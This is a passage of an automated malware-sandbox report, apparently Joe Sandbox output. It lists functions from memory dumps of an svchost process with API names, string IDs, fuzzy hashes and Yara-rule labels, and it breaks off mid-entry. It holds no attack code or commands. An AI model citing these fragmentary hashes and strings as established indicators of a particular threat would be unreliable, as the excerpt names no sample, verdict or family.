                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                          • Instruction ID: 52217abe5b23d7be0f13568c3ab873ef43700a36721ef5492cdb0a298ee8e677
                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                          • Instruction Fuzzy Hash: 9B31B322701F598BF714DF16E958729E7B2FB48B88F0845209E4947B56EF3CCBA19700
                                                          Function 00000233B91ECFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                          • Instruction ID: 325553471cc5ea4d8732be7eaedae694d8db8b6b5999d3dc135c82a72ff6c54c
                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                          • Instruction Fuzzy Hash: 5211AF24605A8C4AFA64E331594D339E2736B887FCF248324EC7A477DBDE2C8B41A610
                                                          Function 00000233B91E199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                          • Instruction ID: 065d6317cef54e097b0ee46a1c6dcbddc1abc98aaccbc236a644296a299a2815
                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                          • Instruction Fuzzy Hash: 35012921304A8886EB64DB52A85C759A3B6F788FC8F888035DE4E43756DF3CCB89D740
                                                          Function 00000233B91E36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                          • Instruction ID: 964645146faaac3863800803d1036144ef3bb7db9b5a6e5ea55f887229c47ad2
                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                          • Instruction Fuzzy Hash: 1C012965711B4C86EB25DB21E80C71AB3B2BB49B8AF140425CD49077A9EF3DC7489704
                                                          Function 00000233B91E9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction ID: ed617a8e86dfa9c16dc590a24e0414c0125f5fcd97da65d9eb975d6cef175401
                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction Fuzzy Hash: 2A519C32701A088AEB24DF25E44CB59B7B7F344BACF508124DA174778AEB79CB81E700
                                                          Function 00000233B91E8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction ID: cb4a2f806613e137a374989b637206449f58324696880ab8436d7d726c0325e6
                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction Fuzzy Hash: BE316832200A489AE714DF22E84CB19B7BAF744BDCF558514AE5B0778ADB3DCB40E704
                                                          Function 00000233B91E1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                          • Instruction ID: c5245171bbed7e0559568c18541e10ba21e2a68708981a67479b32adb4764569
                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                          • Instruction Fuzzy Hash: 6DF04422304A8D92E770CF21F888769A772F788BCCF948020DA4946555DF3CC74DDB00
                                                          Function 00000233B91E3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                          • Instruction ID: a7e0e6358319b48198b90bef630ebe7086351519afbe8d80966cadb062510ac9
                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                          • Instruction Fuzzy Hash: BBF01264714B8C82EA14CB53B91C219E672AB48FD8F085130EE5A47B19DF3CC749A700
                                                          Function 00000233B91EBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                          • Instruction ID: d2ab33044ef1cbe036afce21caa4a3f29450d0f0f096684a8c1f99df1c3e37a1
                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                          • Instruction Fuzzy Hash: 25F06261311A0D81FB10CB25E44C359A372FB847A9F544219CA6A462F5DF2CC389A300
                                                          Function 00000233B91E50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                          • Instruction ID: eff33834f1f9f26c70a400cd327cc4df791a67a2ed3353c49bd59c44d5e42ac0
                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                          • Instruction Fuzzy Hash: 7A02B936619B888AEBA0CB55E49435AF7B1F3C4798F104015EA8E87BA9DF7CC644DB00
                                                          Function 00000233B91E5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                          • Instruction ID: 803899dbf8aaa26860e400001a32c24496c439667045c286395d748bdae113bb
                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                          • Instruction Fuzzy Hash: 1B61C736519A48CAEBA0CB16E44871AB7B2F388798F504115FACE47BA9DB7CC750DB04
                                                          Function 00000233B91F4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 600a11a7908f3dd22bf9399814785442e97ab68714bee873cbc976238b299371
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: FE11A322A1CA5C11F764D568D4DD36591736BB83FCF080634A977277D7CB2CDB456200
                                                          Function 00000233B91C3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618317741.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91b0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 933dbdf0ad777f104ce46fc0a6ad8e117a2d48fd0347a2ea4ffc756fa76948d9
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: E3112932A5CE0103FAA4E128E44F36990B36B5937CF498638A9760E3D6CA2CDB437101
                                                          Function 00000233B91BF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618317741.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91b0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                          • API String ID: 3215553584-4202648911
                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                          • Instruction ID: 3ad45ca4271451dce77923d6b025f867993ecdb22f9625f924e93dbe6ff93b2f
                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                          • Instruction Fuzzy Hash: 5B61B47660064046FA69EB69E54D32EEAB3E78578CFA48915DA0B177A4DB3CCB41F300
                                                          Function 00000233B91EAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction ID: 24f55d2aa8875c1996d9c5f2551683a0b550e387f2ebc37aebd8a71aebeedc9b
                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction Fuzzy Hash: 54616636A01B88CAEB24DF65D48439DB7B2F388B8CF054216EE4917B99DB38D795D700
                                                          Function 00000233B91EAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction ID: da12edcd5451622195c7f40a88f701fb077123ed5b48f9ea598ed0b50b918adc
                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction Fuzzy Hash: D9518B72101A88CEEB64CF25958835DF7B2F354B88F198216EA9947B95CB3CD790E700
                                                          Function 00000233B91BA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618317741.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91b0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction ID: 1d8443788df5b46c3fbffd76fc86e652b29c47b717c78a5562d1c54286f115bb
                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction Fuzzy Hash: 53517A32201280CAEB64CF25955835CB7F3F355B8CF198216DA9987BA5CB3CD791E700
                                                          Function 00000233B91B8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618317741.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91b0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 3242871069-629598281
                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction ID: 73f187b2e6ac0c868d0b868e3d00bcf01c378a206184d1be60e126960cfecf90
                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction Fuzzy Hash: D551BC327116008AEB15DF15E448B59B7B7F358F9CF5481A4DA0A87788EB38DB81EB04
                                                          Function 00000233B91B83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618317741.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91b0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 3242871069-629598281
                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction ID: f79a1ac2d67f5e67b10383d6818f7f3e48fbd2305ba957a0dc8f8a9b150c5904
                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction Fuzzy Hash: 2D31763220164096EB16DF12E848B59B7B7F348F9CF558064EE5A47B88DB3CCB41EB04
                                                          Function 00000233B91F2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                          • Instruction ID: d3dabd2bd18b3d231da740854f96562ae4a05c9c7c1c0523578a5e44e12ca89d
                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                          • Instruction Fuzzy Hash: 36D10232B14A8889E712CFB9D44439CBBB2F35479CF144616CE5E97B9ADA38C706D740
                                                          Function 00000233B91E14A4 Relevance: 6.3, APIs: 5, Instructions: 39memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: 23e5596e6afe4154b2baf6c6de4ac956f245c11af45a2c6a236834124d1c642c
                                                          • Instruction ID: b78b900a61c7b0972e8ba7d7dcf02158eb528884364ea3dbb62bb3cde92a008b
                                                          • Opcode Fuzzy Hash: 23e5596e6afe4154b2baf6c6de4ac956f245c11af45a2c6a236834124d1c642c
                                                          • Instruction Fuzzy Hash: 01014C76608E98DAE704DF66E90824EA7B2F789FC9F044425EB4A4372ADF38C751D740
                                                          Function 00000233B91F2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                          • Instruction ID: a7791001ded918bc64d193931393cf8a941b3cfacde035c049dee59bde1b5247
                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                          • Instruction Fuzzy Hash: BD911672700A5885F761DF6584883ADBBB2F744B8CF544509DE4A67A86DB3CCB86E700
                                                          Function 00000233B91E7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                          • Instruction ID: 0f97a452dc5a164348a871d943864d2a613abb1f2d263a09bc4a8b0d74871ed4
                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                          • Instruction Fuzzy Hash: 48112E22715F0989EB40CF60E8583A873B5F75975CF440E21DEAD467A5DB7CC3A89380
                                                          Function 00000233B91E253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                          • Instruction ID: 93f79a9946ebfcbbe79439086d42cb7c85e89f874b7735a0fe5e930adb6f9dec
                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                          • Instruction Fuzzy Hash: 4171E636600F898AE724DF2598583AAE7B6F39EB8CF440516DD0943B89DE3DCB45D700
                                                          Function 00000233B91B9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618317741.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91b0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction ID: 0d0eebbaa419cc038bb44202a5efc280745f862f339cf9c2cf0b22a4467f54a1
                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction Fuzzy Hash: D4614532A05B848AEB20DF65D48439DBBB2F748B9CF144215EF4917B99DB38D396D700
                                                          Function 00000233B91E2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                          • Instruction ID: f9d11c0a3b9476885ec3ac75f2a2e42c789afc4f3e43ce75f1dbc7cd8383fa12
                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                          • Instruction Fuzzy Hash: 0D510332204F898AE675CB29A16C3BEE7B3F789788F550525DE5903B49CE3DCB05A740
                                                          Function 00000233B91F26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                          • Instruction ID: e19a99b159ce4777b8502ca9dbe026a6d4de475a387a286dbe3e8c7b093ca5e4
                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                          • Instruction Fuzzy Hash: DE41C632715A8886DB20CF25E4483AAB7B2F798798F504521EE4E87799EB3CC741D740
                                                          Function 00000233B91E94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                          • Instruction ID: 19792276a9bb2db9723c9a580e32f0b090d1d5db74ec65aad0e7579a4448168b
                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                          • Instruction Fuzzy Hash: 27112B32214B8882EB61CF15E444359B7E6FB88B98F584221EE8C07759DF3CC755DB00
                                                          Function 00000233B91B7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618317741.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91b0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
